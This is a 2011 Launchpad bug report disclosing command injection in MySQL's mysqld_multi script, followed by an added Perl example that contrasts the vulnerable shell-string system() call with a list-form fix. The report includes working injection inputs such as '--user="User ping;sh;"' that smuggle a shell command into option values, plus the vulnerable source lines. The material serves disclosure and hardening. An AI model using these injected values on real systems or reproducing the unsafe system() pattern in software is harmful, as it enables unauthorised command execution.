[Bug 782298] [NEW] command injections in mysqld_multi
Emanuel Bronshtein
782298 at bugs.launchpad.net
Fri May 13 16:55:03 UTC 2011
Public bug reported:
Binary package hint: mysql-server-5.1
/usr/bin/mysqld_multi has command injection bugs.

Test case:
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example

1) report option:
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011
Reporting MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

2) start option:
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start
SystemInj
$

3) stop option:
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011
Stopping MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

The bug can be found at:

1) sub report_mysqlds
    $com= get_mysqladmin_options($i, @groups);
    $com.= " ping >> /dev/null 2>&1";
    system($com);

2) sub start_mysqlds()
    $com.= $tmp;
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

3) sub stop_mysqlds()
    $com= get_mysqladmin_options($i, @groups);
    $com.= " shutdown";
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

** Affects: mysql-5.1 (Ubuntu)
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Ubuntu
Server Team, which is subscribed to mysql-5.1 in Ubuntu.
https://bugs.launchpad.net/bugs/782298
Title:
command injections in mysqld_multi
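
Added example (not part of the original report and not mysqld_multi's own code): the single-string system() pattern quoted in the report next to a list-form replacement that opens the log file from Perl, so option values never reach a shell. "echo" stands in for the MySQL command line; run_string(), run_logged() and the temporary log path are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not mysqld_multi code. "echo" stands in for the mysqld
# command line; run_string() and run_logged() are hypothetical helpers.
use strict;
use warnings;
use File::Temp qw(tempdir);

$| = 1;    # keep our output ordered with the children's output

# Constructed --log value with the same metacharacters as the report's test case.
my $dir     = tempdir(CLEANUP => 1);
my $opt_log = "$dir/mlog;echo SystemInj";

# Pattern from the report: a single string is handed to /bin/sh -c, so the ';'
# in the option value ends the intended command and starts a second one.
sub run_string {
    my ($log) = @_;
    my $com = "echo starting";
    $com .= " >> $log 2>&1";
    return system($com);
}

# Hardened form: argv is passed as a list and the log is opened by Perl in the
# child, so no shell ever parses the option value.
sub run_logged {
    my ($log, @argv) = @_;
    my $pid = fork();
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {
        open(STDOUT, '>>', $log)     or die "cannot open $log: $!";
        open(STDERR, '>&', \*STDOUT) or die "cannot dup stdout: $!";
        exec { $argv[0] } @argv      or die "cannot exec $argv[0]: $!";
    }
    waitpid($pid, 0);
    return $? >> 8;
}

print "-- string form --\n";
run_string($opt_log);                     # the injected echo prints SystemInj
print "-- list form --\n";
run_logged($opt_log, 'echo', 'starting'); # nothing is printed to the terminal

# The list form appended to a file whose name contains the ';' literally.
open(my $fh, '<', $opt_log) or die "expected literal log file: $!";
print "logged: ", scalar(<$fh>);
close($fh);
```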